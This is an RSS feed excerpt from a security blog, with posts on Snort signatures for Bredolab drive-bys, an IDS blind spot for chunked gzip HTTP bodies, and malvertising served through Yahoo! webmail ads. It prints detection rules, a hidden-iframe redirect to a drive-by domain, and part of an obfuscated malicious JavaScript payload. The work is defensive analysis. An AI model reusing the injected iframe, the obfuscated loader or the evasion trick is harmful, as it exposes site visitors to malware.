<pre style="PADDING-LEFT: 30px">SPECIFIC-THREATS Bredolab downloader communication with server attempt
BACKDOOR rogue software xp police antivirus install-timedetection</pre>
<p>The signatures we have written to detect the drive-bys and the redirects to them are as follows. They were published to the Emerging Threats mailing list a while back; these are what we run for our client to find this stuff. The false positive rates are very low except for the first signature: some people download lists of malicious sites from web servers, and that causes the sig to fire. You can easily identify those and suppress the FPs with Snort&#8217;s threshold.conf file:</p>
<pre style="PADDING-LEFT: 30px">alert tcp $EXTERNAL_NET $HTTP_PORTS -&gt; $HOME_NET any (msg:"DRIVEBY bredolab - server response contains .ru:8080/index.php?"; flow:established,to_client; content:".ru:8080/index.php?"; classtype:bad-unknown; sid:5600083; rev:1;)
alert tcp $HOME_NET any -&gt; $EXTERNAL_NET $HTTP_PORTS (msg:"DRIVEBY bredolab - cookie: pid=1"; flow:established,to_server; content:"pid=1|0D|"; http_cookie; classtype:bad-unknown; sid:5600084; rev:1;)
alert tcp $HOME_NET any -&gt; $EXTERNAL_NET $HTTP_PORTS (msg:"DRIVEBY bredolab - jquery.jxx"; flow:established,to_server; content:"/jquery.jxx?v="; http_uri; classtype:bad-unknown; sid:5600085; rev:1;)
alert tcp $HOME_NET any -&gt; $EXTERNAL_NET $HTTP_PORTS (msg:"DRIVEBY bredolab - request to a *.ru:8080 URI"; flow:established,to_server; content:".ru:8080|0D 0A|"; http_header; classtype:bad-unknown; sid:5600086; rev:1;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -&gt; $HOME_NET any (msg:"DRIVEBY bredolab - hidden div served by nginx"; flow:established,to_client; content:"Server: nginx"; http_header; content:"&lt;div style=\"visibility: hidden\;\"&gt;&lt;"; depth:120; classtype:bad-unknown; sid:5600089; rev:1;)</pre>
]]></content:encoded>
			<wfw:commentRss>http://trojanedbinaries.com/blog/?feed=rss2&amp;p=188</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Who Needs SSL? Evading IDS With Apache mod_gzip and Chunked Encoding</title>
		<link>http://trojanedbinaries.com/blog/?p=186</link>
		<comments>http://trojanedbinaries.com/blog/?p=186#comments</comments>
		<pubDate>Thu, 12 Aug 2010 21:44:11 +0000</pubDate>
		<dc:creator>Eoin Miller</dc:creator>
				<category><![CDATA[IDS]]></category>
		<category><![CDATA[Malvertising]]></category>

		<guid isPermaLink="false">http://trojanedbinaries.com/blog/?p=186</guid>
		<description><![CDATA[<p>After getting a bit frustrated a little while ago while attempting to write a signature for some hidden iframes that were redirecting clients to drive by sites, I started digging around a bit more and even posted over on the Snort-Users mailing list and found out something a little terrifying from the guys over at SourceFire. Snort [...]]]></description>
			<content:encoded><![CDATA[<p>After getting a bit frustrated a little while ago while attempting to write a signature for some hidden iframes that were redirecting clients to drive-by sites, I started digging around a bit more, posted over on the <a href="https://lists.sourceforge.net/lists/listinfo/snort-users">Snort-Users mailing list</a>, and found out something a little terrifying from the guys over at <a href="http://www.sourcefire.com">SourceFire</a>. <a href="http://www.snort.org/">Snort</a> (or <a href="http://openinfosecfoundation.org/index.php/downloads">Suricata</a>, for that matter) will not actually gunzip a gzip&#8217;d HTTP body if it has been transferred with chunked encoding. Now, you may be thinking to yourself &#8220;that&#8217;s not true, I have my http_inspect configured the way it comes with the VRT ruleset downloads and it has the gzip and chunked encoding configuration options enabled!&#8221; Unfortunately, the current logic of the program dechunks the data, runs the signatures against the dechunked (but still gzip&#8217;d) data, then discards it and moves on to the next packet. One would hope the logic will be updated so that when an HTTP body is chunked and gzip&#8217;d it does dechunk-&gt;gunzip-&gt;compare against signatures. That would allow people to reliably inspect the body of an HTTP response instead of only being able to write sigs on the compressed content of the body (though there may be some instances where matching on the compressed content is beneficial). The trouble is that this is a large amount of traffic: do you want to (or have) the processor cycles to compare the gzip&#8217;d data and then the gunzip&#8217;d data? Below we go through the process step by step to demonstrate this issue. Here we have our response packet, which you can see is chunked and compressed with gzip (as indicated in the HTTP headers):</p>
<pre style="TEXT-ALIGN: left; PADDING-LEFT: 30px">00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
00000010  0a 53 65 72 76 65 72 3a  20 6e 67 69 6e 78 2f 30 .Server:  nginx/0
00000020  2e 36 2e 33 39 0d 0a 44  61 74 65 3a 20 4d 6f 6e .6.39..D ate: Mon
00000030  2c 20 31 32 20 4a 75 6c  20 32 30 31 30 20 31 38 , 12 Jul  2010 18
00000040  3a 30 37 3a 31 30 20 47  4d 54 0d 0a 43 6f 6e 74 :07:10 G MT..Cont
00000050  65 6e 74 2d 54 79 70 65  3a 20 74 65 78 74 2f 68 ent-Type : text/h
00000060  74 6d 6c 0d 0a 54 72 61  6e 73 66 65 72 2d 45 6e tml..<span style="color: #ff0000;">Tra nsfer-En</span>
00000070  63 6f 64 69 6e 67 3a 20  63 68 75 6e 6b 65 64 0d <span style="color: #ff0000;">coding:  chunked</span>.
00000080  0a 43 6f 6e 6e 65 63 74  69 6f 6e 3a 20 6b 65 65 .Connect ion: kee
00000090  70 2d 61 6c 69 76 65 0d  0a 58 2d 50 6f 77 65 72 p-alive. .X-Power
000000A0  65 64 2d 42 79 3a 20 50  48 50 2f 35 2e 31 2e 36 ed-By: P HP/5.1.6
000000B0  0d 0a 43 6f 6e 74 65 6e  74 2d 45 6e 63 6f 64 69 ..<span style="color: #ff0000;">Conten t-Encodi</span>
000000C0  6e 67 3a 20 67 7a 69 70  0d 0a 0d 0a 61 0d 0a 1f <span style="color: #ff0000;">ng: gzip</span> ....a...
000000D0  8b 08 00 00 00 00 00 00  03 0d 0a 31 33 30 0d 0a ........ ...130..
000000E0  bd 52 cb 4e c4 30 0c bc  ef 57 44 b9 04 24 da 74 .R.N.0.. .WD..$.t
000000F0  d9 07 85 4d 7a 44 82 03  1c e0 07 d2 d6 6d 22 d2 ...MzD.. .....m".
00000100  64 37 75 f7 f1 f7 a4 dd  15 42 20 ae f8 64 8f 3d d7u..... .B ..d.=
00000110  1e 6b 64 a1 b1 b3 85 d0  a0 ea 62 26 3a 40 45 34 .kd..... ..b&amp;:@E4
00000120  e2 36 81 dd 60 f6 92 56  de 21 38 4c f0 b4 05 4a .6..`..V .!8L...J
00000130  2e 95 a4 08 47 e4 23 73  43 2a ad 42 0f 28 9f de ....G.#s C*.B.(..
00000140  5e 93 3c 5f dd 27 73 1a  17 a1 41 0b c5 32 5b 92 ^.&lt;_.'s. ..A..2[.
00000150  17 8f e4 d1 0f ae 16 fc  0c 0a 3e 89 89 d2 d7 27 ........ ..&gt;....'
00000160  52 b6 95 b7 3e 48 7a d0  06 61 64 56 51 0e 42 bc R...&gt;Hz. .adVQ.B.
00000170  68 fe 93 1e 11 c1 2f ed  99 d0 71 e6 52 b8 d6 b8 h...../. ..q.R...
00000180  23 cf d2 75 ba 58 7d 9b  e0 a3 42 31 fb ff f8 65 #..u.X}. ..B1...e
00000190  23 0b d0 04 e8 35 fb 72  90 dd 6d 86 60 e5 68 f5 #....5.r ..m.`.h.
000001A0  03 e7 25 58 6b 2a df c3  47 9e 1a d7 78 be cb 7b ..%Xk*.. G...x..{
000001B0  ce 0a d1 57 c1 6c 91 58  e5 da 41 b5 20 e9 b3 da ...W.l.X ..A. ...
000001C0  ab b7 09 a4 05 e9 c1 36  69 e7 f7 f0 ee af 16 d9 .......6 i.......
000001D0  72 7d b3 c8 56 eb eb 0d  11 fc cc 8b 66 9a 26 a8 r}..V... ....f.&amp;.
000001E0  0e 48 1f 2a c9 fe d2 72  b7 96 33 72 30 35 6a c9 .H.*...r ..3r05j.
000001F0  e6 8c 68 30 ad c6 29 9d  d8 a5 0f 35 04 c9 b2 78 ..h0..). ...5...x
00000200  10 3f 2f 8c c9 f4 36 9f  04 6b bf 18 3d 02 00 00 .?/...6. .k..=...
00000210  0d 0a 30 0d 0a 0d 0a                             ..0....</pre>
<p style="TEXT-ALIGN: left">Here we have extracted the chunked body of this response (which is still compressed with gzip). Looking at it at this point, there really isn&#8217;t anything in here that our sigs are going to fire on. However, since the http_inspect preprocessor has dechunked the data into this buffer, it compares the signatures at this point without gunzip&#8217;ing it. Once the comparison is complete it moves on to the next packet:</p>
<pre style="PADDING-LEFT: 30px">0000   1f 8b 08 00 00 00 00 00 00 03 bd 52 cb 4e c4 30  ...........R.N.0
0010   0c bc ef 57 44 b9 04 24 da 74 d9 07 85 4d 7a 44  ...WD..$.t...MzD
0020   82 03 1c e0 07 d2 d6 6d 22 d2 64 37 75 f7 f1 f7  .......m".d7u...
0030   a4 dd 15 42 20 ae f8 64 8f 3d 1e 6b 64 a1 b1 b3  ...B ..d.=.kd...
0040   85 d0 a0 ea 62 26 3a 40 45 34 e2 36 81 dd 60 f6  ....b&amp;:@E4.6..`.
0050   92 56 de 21 38 4c f0 b4 05 4a 2e 95 a4 08 47 e4  .V.!8L...J....G.
0060   23 73 43 2a ad 42 0f 28 9f de 5e 93 3c 5f dd 27  #sC*.B.(..^.&lt;_.'
0070   73 1a 17 a1 41 0b c5 32 5b 92 17 8f e4 d1 0f ae  s...A..2[.......
0080   16 fc 0c 0a 3e 89 89 d2 d7 27 52 b6 95 b7 3e 48  ....&gt;....'R...&gt;H
0090   7a d0 06 61 64 56 51 0e 42 bc 68 fe 93 1e 11 c1  z..adVQ.B.h.....
00a0   2f ed 99 d0 71 e6 52 b8 d6 b8 23 cf d2 75 ba 58  /...q.R...#..u.X
00b0   7d 9b e0 a3 42 31 fb ff f8 65 23 0b d0 04 e8 35  }...B1...e#....5
00c0   fb 72 90 dd 6d 86 60 e5 68 f5 03 e7 25 58 6b 2a  .r..m.`.h...%Xk*
00d0   df c3 47 9e 1a d7 78 be cb 7b ce 0a d1 57 c1 6c  ..G...x..{...W.l
00e0   91 58 e5 da 41 b5 20 e9 b3 da ab b7 09 a4 05 e9  .X..A. .........
00f0   c1 36 69 e7 f7 f0 ee af 16 d9 72 7d b3 c8 56 eb  .6i.......r}..V.
0100   eb 0d 11 fc cc 8b 66 9a 26 a8 0e 48 1f 2a c9 fe  ......f.&amp;..H.*..
0110   d2 72 b7 96 33 72 30 35 6a c9 e6 8c 68 30 ad c6  .r..3r05j...h0..
0120   29 9d d8 a5 0f 35 04 c9 b2 78 10 3f 2f 8c c9 f4  )....5...x.?/...
0130   36 9f 04 6b bf 18 3d 02 00 00                    6..k..=...</pre>
<p>However, if we gunzip this extracted data, we get the following, which contains something we are very interested in writing a signature for: a hidden iframe redirecting the client to a drive-by site:</p>
<pre style="PADDING-LEFT: 30px">0000   3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65  &lt;html&gt;&lt;head&gt;.&lt;me
0010   74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63  ta http-equiv="c
0020   6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e  ontent-type" con
0030   74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b  tent="text/html;
0040   20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35   charset=ISO-885
0050   39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34  9-1"&gt;.&lt;title&gt;404
0060   20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c   Not Found&lt;/titl
0070   65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62  e&gt;&lt;/head&gt;&lt;body b
0080   67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a  gcolor="white"&gt;.
0090   3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20  &lt;center&gt;&lt;h1&gt;404
00a0   4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f  Not Found&lt;/h1&gt;&lt;/
00b0   63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e  center&gt;.&lt;hr&gt;&lt;cen
00c0   74 65 72 3e 6e 67 69 6e 78 2f 30 2e 36 2e 33 35  ter&gt;nginx/0.6.35
00d0   3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79  &lt;/center&gt;.&lt;/body
00e0   3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  &gt;...............
00f0   0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  ................
0100   0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  ................
0110   0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  ................
0120   0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  ................
0130   0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  ................
0140   0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a  ................
0150   0a 0a 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65  ....&lt;meta http-e
0160   71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63  quiv='refresh' c
0170   6f 6e 74 65 6e 74 3d 27 37 3b 75 72 6c 3d 68 74  ontent='7;url=ht
0180   74 70 3a 2f 2f 62 65 6c 6c 69 63 6f 73 65 6b 38  tp://bellicosek8
0190   2e 69 6e 66 6f 2f 71 38 73 2f 27 3e 3c 73 63 72  .info/q8s/'&gt;&lt;scr
01a0   69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61  ipt language="Ja
01b0   76 61 53 63 72 69 70 74 22 3e 20 73 65 6c 66 2e  vaScript"&gt; self.
01c0   6d 6f 76 65 54 6f 28 33 30 34 36 2c 33 30 35 36  moveTo(3046,3056
01d0   29 3b 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 69 66  ); &lt;/script&gt;.&lt;if
01e0   72 61 6d 65 20 73 72 63 3d 27 68 74 74 70 3a 2f  rame src='http:/
01f0   2f 62 65 6c 6c 69 63 6f 73 65 6b 38 2e 69 6e 66  /bellicosek8.inf
0200   6f 2f 6e 32 6c 2f 27 20 77 69 64 74 68 3d 27 31  o/n2l/' width='1
0210   27 20 68 65 69 67 68 74 3d 27 31 27 20 66 72 61  ' height='1' fra
0220   6d 65 62 6f 72 64 65 72 3d 27 30 27 3e 3c 2f 69  meborder='0'&gt;&lt;/i
0230   66 72 61 6d 65 3e 3c 2f 68 74 6d 6c 3e           frame&gt;&lt;/html&gt;</pre>
<p>Or the following in just plain old printable HTML output:</p>
<pre style="PADDING-LEFT: 30px">&lt;html&gt;&lt;head&gt;
&lt;meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"&gt;
&lt;title&gt;404 Not Found&lt;/title&gt;&lt;/head&gt;&lt;body bgcolor="white"&gt;
&lt;center&gt;&lt;h1&gt;404 Not Found&lt;/h1&gt;&lt;/center&gt;
&lt;hr&gt;&lt;center&gt;nginx/0.6.35&lt;/center&gt;
&lt;/body&gt;</pre>
<pre style="PADDING-LEFT: 30px">&lt;meta http-equiv='refresh' content='7;url=http://bellicosek8.info/q8s/'&gt;&lt;script language="JavaScript"&gt; self.moveTo(3046,3056); &lt;/script&gt;
&lt;<span style="color: #ff0000;">iframe</span> src='http://bellicosek8.info/n2l/' width='1' height='1' frameborder='0'&gt;&lt;/<span style="color: #ff0000;">iframe</span>&gt;&lt;/html&gt;</pre>
<p>So in testing, we wrote the simplest of signatures, looking for just the string &#8220;iframe&#8221;, and ran it against the sample PCAP we had. The signature was as follows:</p>
<pre>alert tcp any any -&gt;  any any (msg:"MALVERTISING hidden iframe served by nginx 2"; content:"<span style="color: #ff0000;">iframe</span>"; nocase; classtype:bad-unknown; sid:5600066; rev:1;)</pre>
<p>When we look at the output on the console, we get zero alerts, which should not be the case. Below is the output from Snort regarding http_inspect while running against the PCAP we were using for testing. Here we notice something odd: there is a non-zero value for &#8220;HTTP Response Gzip packets extracted&#8221; and for &#8220;Gzip Compressed Data Processed&#8221;, but the value for &#8220;Gzip Decompressed Data Processed&#8221; is &#8220;0.00&#8221;.</p>
<pre style="PADDING-LEFT: 30px">HTTP Inspect - encodings (Note: stream-reassembled packets included):
     POST methods:                         0
     GET methods:                          2
     HTTP Request Headers extracted:       2
     HTTP Request Cookies extracted:       0
     Post parameters extracted:            0
     HTTP response Headers extracted:      2
     HTTP Response Cookies extracted:      0
     Unicode:                              0
     Double unicode:                       0
     Non-ASCII representable:              0
     Base 36:                              0
     Directory traversals:                 0
     Extra slashes ("//"):                 0
     Self-referencing paths ("./"):        0
<span style="color: #ff0000;">     HTTP Response Gzip packets extracted: 2
     Gzip Compressed Data Processed:       331.00
     Gzip Decompressed Data Processed:     0.00 </span>
     Total packets processed:              4</pre>
<p>So it appears that Snort&#8217;s http_inspect does indeed identify and extract the gzip&#8217;d packets, but it does not unzip and inspect them if they were transferred via chunked encoding. Below is the section of the snort.conf file regarding http_inspect that was used during testing. This should be the same configuration you receive in the snort.conf file contained within the <a href="http://www.snort.org/snort-rules/">VRT ruleset</a> you download from <a href="http://www.snort.org">Snort.org</a>. Note that we definitely have this configured to decompress, dechunk and inspect gzip&#8217;d data (all highlighted in red), and the values for each of these options in the configuration are much, much larger than anything we are dealing with in the example PCAP.</p>
<pre style="PADDING-LEFT: 30px">preprocessor http_inspect: global iis_unicode_map unicode.map 1252 <span style="color: #ff0000;">compress_depth 20480 decompress_depth 20480</span>
preprocessor http_inspect_server: server default \
     <span style="color: #ff0000;">chunk_length 500000</span> \
     server_flow_depth 0 \
     client_flow_depth 0 \
     post_depth 65495 \
         oversize_dir_length 500 \
     max_header_length 750 \
     max_headers 100 \
     ports { 80 1220 2301 3128 7777 7779 8000 8008 8028 8080 8180 8888 9999 }\
     non_rfc_char { 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 } \
     enable_cookie \
     extended_response_inspection \
     <span style="color: #ff0000;">inspect_gzip</span> \
     apache_whitespace no \
     ascii no \
     bare_byte no \
         directory no \
         double_decode no \
         iis_backslash no \
         iis_delimiter no \
         iis_unicode no \
         multi_slash no \
         non_strict \
         u_encode yes \
         webroot no</pre>
<p>Unfortunately, quite a bit of gzip&#8217;d content is transmitted with chunked encoding. Chunked encoding is used when the server does not know the content length of the response in advance. When a web server compresses data on the fly for delivery to a client, it generally ends up using this method, since it cannot compute how large the response will be until after it has already started sending data back to the client. Hopefully functionality will be added to remedy the inability to inspect these types of HTTP responses, because this is currently being leveraged to evade IDS quite frequently by many different types of FakeAV, drive-by and malvertising sites in the wild.</p>
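<p>As an added example, not code from the original post or from Snort, here is a small Python inspection pipeline that builds a constructed chunked, gzip-compressed response like the one above and checks a content match both after dechunking only and after dechunk-&gt;gunzip. The hostname in the sample HTML is a placeholder; the function names are this example&#8217;s own.</p>

```python
import gzip

# Added example, not code from the original post or from Snort: a minimal
# inspection pipeline showing why a content match fails on a chunked,
# gzip-compressed body unless the body is dechunked AND gunzipped first.

CRLF = b"\r\n"


def chunked(payload: bytes, chunk_size: int = 16) -> bytes:
    """Frame bytes as an HTTP/1.1 chunked body, the way a server would."""
    out = bytearray()
    for i in range(0, len(payload), chunk_size):
        piece = payload[i:i + chunk_size]
        out += b"%x" % len(piece) + CRLF + piece + CRLF
    out += b"0" + CRLF + CRLF  # zero-length chunk terminates the body
    return bytes(out)


def dechunk(body: bytes) -> bytes:
    """Reassemble a chunked body; raises ValueError on broken framing."""
    out = bytearray()
    pos = 0
    while True:
        end = body.find(CRLF, pos)
        if end < 0:
            raise ValueError("missing chunk-size line")
        size_field = body[pos:end].split(b";", 1)[0].strip()  # drop extensions
        size = int(size_field, 16)
        pos = end + 2
        if size == 0:
            return bytes(out)  # trailers, if any, are ignored here
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != CRLF:
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2


def split_response(raw: bytes):
    """Split a raw response into a lower-cased header dict and the body."""
    head, _, body = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:  # skip the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    return headers, body


def inspect_response(raw: bytes, pattern: bytes) -> dict:
    """Report whether `pattern` matches after dechunking only (what the post
    observes http_inspect doing) and after the full dechunk -> gunzip path."""
    headers, body = split_response(raw)
    if headers.get(b"transfer-encoding") == b"chunked":
        body = dechunk(body)
    hit_dechunked = pattern in body
    if headers.get(b"content-encoding") == b"gzip":
        body = gzip.decompress(body)
    return {"dechunked_only": hit_dechunked,
            "dechunked_and_gunzipped": pattern in body}


# Constructed response modelled on the capture above: a 404 page with a hidden
# 1x1 iframe appended, gzip'd and chunked by the server. The hostname is a
# placeholder, not one from the post.
SAMPLE_HTML = (
    b"<html><head><title>404 Not Found</title></head><body bgcolor=\"white\">\n"
    b"<center><h1>404 Not Found</h1></center>\n<hr><center>nginx</center>\n"
    b"</body>\n<iframe src='http://redirector.invalid/n2l/' width='1' "
    b"height='1' frameborder='0'></iframe></html>"
)


def build_sample_response(html: bytes = SAMPLE_HTML) -> bytes:
    head = CRLF.join([
        b"HTTP/1.1 200 OK", b"Server: nginx", b"Content-Type: text/html",
        b"Transfer-Encoding: chunked", b"Content-Encoding: gzip",
    ]) + CRLF + CRLF
    return head + chunked(gzip.compress(html, mtime=0))


if __name__ == "__main__":
    print(inspect_response(build_sample_response(), b"iframe"))
    # prints: {'dechunked_only': False, 'dechunked_and_gunzipped': True}
```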
]]></content:encoded>
			<wfw:commentRss>http://trojanedbinaries.com/blog/?feed=rss2&amp;p=186</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Anatomy of Malicious Advertising Redirecting Clients to Drive-By Attack Sites</title>
		<link>http://trojanedbinaries.com/blog/?p=177</link>
		<comments>http://trojanedbinaries.com/blog/?p=177#comments</comments>
		<pubDate>Fri, 06 Aug 2010 21:41:28 +0000</pubDate>
		<dc:creator>Eoin Miller</dc:creator>
				<category><![CDATA[Malvertising]]></category>

		<guid isPermaLink="false">http://trojanedbinaries.com/blog/?p=177</guid>
		<description><![CDATA[<p>Below we have a user who has done something millions upon millions of people do every day, login to their Yahoo! webmail. However, this time around Yahoo! is going to let someone they have a business relationship with attempt to exploit them and deliver malicious software onto their computer. Upon visiting the site, Yahoo! will [...]]]></description>
			<content:encoded><![CDATA[<p>Below we have a user who has done something millions upon millions of people do every day: log in to their Yahoo! webmail. However, this time around Yahoo! is going to let someone they have a business relationship with attempt to exploit them and deliver malicious software onto their computer. Upon visiting the site, Yahoo! causes the client to make the following request to a malvertising server (c3metrics.net). Please note that the referer in the request below is a web service that routes the client to the advertisement displayed to clients logging in to the Yahoo! webmail service; if you visit it directly and read the JavaScript comments you can validate this:</p>
<pre>GET /jsc/fm.js?n=162&amp;c=24/1&amp;d=14&amp;s=23&amp;w=1&amp;h=1&amp;nc=1275511688&amp;l=&amp;z= HTTP/1.1
Accept: */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&amp;v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; &lt;REMOVED&gt;)
Host: c3metrics.net
Connection: Keep-Alive</pre>
<p>The response to this request is an HTTP 301 status code that redirects from the URI above to the one below; they are nearly identical except for a single backslash between the fm.js and the ?n:</p>
<pre>HTTP/1.1 301 Moved Permanently
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 &lt;REMOVED&gt;
Content-Type: text/html
Content-Length: 185
Location: http://c3metrics.net/jsc/fm.js/?n=162&amp;c=24/1&amp;d=14&amp;s=23&amp;w=1&amp;h=1&amp;nc=1275511688&amp;l=&amp;z=
Connection: keep-alive</pre>
<pre>&lt;html&gt;
&lt;head&gt;&lt;title&gt;301 Moved Permanently&lt;/title&gt;&lt;/head&gt;
&lt;body bgcolor="white"&gt;
&lt;center&gt;&lt;h1&gt;301 Moved Permanently&lt;/h1&gt;&lt;/center&gt;
&lt;hr&gt;&lt;center&gt;nginx/0.8.45&lt;/center&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
<p>Now the user follows the redirected URI it received:</p>
<pre>Request:
GET /jsc/fm.js/?n=162&amp;c=24/1&amp;d=14&amp;s=23&amp;w=1&amp;h=1&amp;nc=1275511688&amp;l=&amp;z= HTTP/1.1
Accept: */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&amp;v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; &lt;REMOVED&gt;)
Host: c3metrics.net
Connection: Keep-Alive</pre>
<p>However, this time around the malvertising server serves the client some JavaScript that is obfuscated in order to escape detection or analysis by various types of network security tools (IDS, IPS, etc.):</p>
<pre>HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 &lt;REMOVED&gt;
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 3572</pre>
<pre>var _MlgYp=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1));var RUOR=this;var JXzn_=RUOR [_MlgYp];var CVXMF_s=new String('unescape');var uhbnP=RUOR [CVXMF_s];var IBpC='PrMPdkPd=PJOPd=PJ/PJkPd=PJgPJsParPkgParPa2PJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2Pa/PaqPJdPJiPd=P=JPdiPJsPJsPi/PJiPJOPdaPa2Pa/PasParPkrPasParPkOPasParPkrPasParPkrPasParPkrPasParPkrPa/ParPagParPJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2Pa/PaqPJdPJiPd=P=JPdiPJsPJsPi/PJiPJOPdaPa2Pa/PasParPkrPasParPkOPasParPkrPasParPkrPasParPkrPasParPkrPa/PaqPd=PJ3P=dP=gPi=PikPd=PdaPJ/PJqPJdPa2Pa/PaqPdkPdiPJaPdkPd=PdaPJ/PJqPJdPa2PkrPasParPJqPJiPddParP==PJOPd=PJiPa2PJqPJiPddParP==PJOPd=PJiPa2Pa/PaqPJdPJiPd=P=JPdiPJsPJsPi/PJiPJOPdaPa2Pa/PasParPkrPasParPkOPasParPkrPasParPkrPasParPkrPasParPkrPa/PaqPd=PJ3P=dP=gPi=PikPd=PdaPJ/PJqPJdPa2Pa/PaqPJsPJOPdkPd=P=/PJqPJ=PJiPd2P=3PJJPa2PaaParPaaPa/PagPkOPa/Pa/Pa/ParPa3ParPa2PkOPkrPkrPkrParPaMParPkJPkrParPaMParPkJPkrPa/PkmPrMPrMPdJPJOPdaParPJOPJsPJsPi3Pd=ParPkgParPaaPkOPasPkaPasPkkPasPk=PasPkiPasPkJPasPkdPasPk2PasPk/PaaPkmPrMPdJPJOPdaParPJgPd=PJkPJ2ParPkgParPJOPJsPJsPi3Pd=PaqPJgPJOPd=PJkPJ2Pa2PdkPd=PJOPd=PJ/PJkPd=PJgPJsPa/PkmPrMPrMPrMPrMPJ/PJJParPa2ParPJgPd=PJkPJ2ParPaOPkgParPJqPdiPJsPJsParPa/ParPdmPrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJ/PJJPdaPJOPJgPJiParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PJkPkkPJgPJiPd=PdaPJ/PJkPdkPaqPJqPJiPd=Pa3PdkPd=PJOPd=PdkPi3Pd=PaqPdrPJ2PdrPk3PJ/PJ=PkgPkOPkaPkdPkiPkiPkOPkOPkJPk2Pk2PaJPdkPkgPkrPaJPJiPkgPkOPadParPdkPd=Pd/PJsPJiPkgPadPdJPJ/PdkPJ/PJaPJ/PJsPJ/Pd=Pd/PkMPJ2PJ/PJ=PJ=PJiPJqPkmPadParPddPJ/PJ=Pd=PJ2PkgPadPkrPadParPJ2PJiPJ/PJdPJ2Pd=PkgPadPkrPadParParPaiPkkP=iPaiPkkP=kPa3PJ/PJJPdaPJOPJgPJiPaiPkkP=iPaaPa/Pa/PkmPrMPdgParParPJiPJsPdkPJiParParPdmPrMPrMPr/Pr/PrMPJ=PJ3PJkPdiPJgPJiPJqPd=PaqPddPdaPJ/Pd=PJiPa2PdiPJqPJiPdkPJkPJOPdrPJiPa2PaaPaiPkkP=kPJ/PJJPdaPJOPJgPJiParPdkPdaPJkPkgPadPJ2Pd=Pd=PdrPkMPa3Pa3PddPJ/PJsPdkPd=PJ3PdkPJiPaqPJkPJ3PaqPJkPJkPa3PdMPJgPd
